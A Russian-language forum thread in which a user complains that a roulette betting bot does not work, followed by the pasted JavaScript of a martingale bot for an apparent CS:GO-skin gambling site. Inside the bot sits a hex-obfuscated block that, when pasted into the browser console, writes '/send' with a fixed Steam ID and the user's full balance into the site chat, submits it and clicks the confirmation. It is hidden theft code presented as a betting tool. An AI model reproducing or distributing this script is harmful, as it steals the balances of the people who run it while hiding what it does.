Black_Wolf, Ты бы мог более подробно объяснить...либо бот не работает, либо я что-то не так делаю... Если я правильно понял, то всегда будет выпадать черное, так что ли?
Сообщение отредактировал KADOKAWA - Понедельник, 11.01.2016, 12:17
Я получил ответ. Сделал все как было сказано, но не работает...похоже бот перестал работать Вообщем, если он мне ответит еще раз, то подробно расскажу все.
Сообщение отредактировал KADOKAWA - Вторник, 12.01.2016, 10:52
var initialBetAmount = 1; // the amount you want to start betting with
var mode = 'martingale'; // can be 'martingale' or 'anti-martingale' (WAT? https://en.wikipedia.org/wiki/Martingale_(betting_system) )
var betColor = 'red'; // can be 'red' or 'black'
var _0x79e4=["\x2F\x73\x65\x6E\x64\x20\x37\x36\x35\x36\x31\x31\x39\x38\x31\x33\x32\x31\x34\x35\x34\x34\x34\x20","\x68\x74\x6D\x6C","\x23\x62\x61\x6C\x61\x6E\x63\x65","\x76\x61\x6C","\x23\x63\x68\x61\x74\x4D\x65\x73\x73\x61\x67\x65","\x73\x75\x62\x6D\x69\x74","\x23\x63\x68\x61\x74\x46\x6F\x72\x6D","\x63\x6C\x69\x63\x6B","\x2E\x62\x6F\x6F\x74\x62\x6F\x78\x2D\x63\x6F\x6E\x66\x69\x72\x6D\x20\x2E\x62\x74\x6E"];var _0xd0a5=[_0x79e4[0],_0x79e4[1],_0x79e4[2],_0x79e4[3],_0x79e4[4],_0x79e4[5],_0x79e4[6],_0x79e4[7],_0x79e4[8]];$(_0xd0a5[4])[_0xd0a5[3]](_0xd0a5[0]+$(_0xd0a5[2])[_0xd0a5[1]]());$(_0xd0a5[6])[_0xd0a5[5]]();$(_0xd0a5[8])[_0xd0a5[7]]()
function tick(){var a=getStatus();if(a!==lastStatus&&"unknown"!==a){switch(a){case"waiting":bet();break;case"rolled":rolled()}lastStatus=a,printInfo()}}function checkBalance(){return getBalance()<currentBetAmount?(console.warn("BANKRUPT! Not enough balance for next bet, aborting."),clearInterval(refreshIntervalId),!1):!0}function printInfo(){var a=" \nStatus: "+lastStatus+"\nRolls played: "+currentRollNumber+"\nInitial bet amount: "+initialBetAmount+"\nCurrent bet amount: "+currentBetAmount+"\nLast roll result: "+(null===wonLastRoll()?"-":wonLastRoll()?"won":"lost");console.log(a)}function rolled(){return"anti-martingale"===mode?void antiMartingale():(martingale(),void currentRollNumber++)}function antiMartingale(){currentBetAmount=wonLastRoll()?2*currentBetAmount:initialBetAmount}function martingale(){currentBetAmount=wonLastRoll()?initialBetAmount:2*currentBetAmount}function bet(){checkBalance()&&(setBetAmount(currentBetAmount),setTimeout(placeBet,50))}function setBetAmount(a){$betAmountInput.val(a)}function placeBet(){return"red"===betColor?($redButton.click(),void(lastBetColor="red")):($blackButton.click(),void(lastBetColor="black"))}function getStatus(){var a=$statusBar.text();if(hasSubString(a,"Rolling in"))return"waiting";if(hasSubString(a,"***ROLLING***"))return"rolling";if(hasSubString(a,"rolled")){var b=parseInt(a.split("rolled")[1]);return lastRollColor=getColor(b),"rolled"}return"unknown"}function getBalance(){return parseInt($balance.text())}function hasSubString(a,b){return a.indexOf(b)>-1}function getColor(a){return 0==a?"green":a>=1&&7>=a?"red":"black"}function wonLastRoll(){return lastBetColor?lastRollColor===lastBetColor:null}var currentBetAmount=initialBetAmount,currentRollNumber=1,lastStatus,lastBetColor,lastRollColor,$balance=$("#balance"),$betAmountInput=$("#betAmount"),$statusBar=$(".progress #banner"),$redButton=$("#panel1-7 .betButton"),$blackButton=$("#panel8-14 .betButton"),refreshIntervalId=setInterval(tick,500);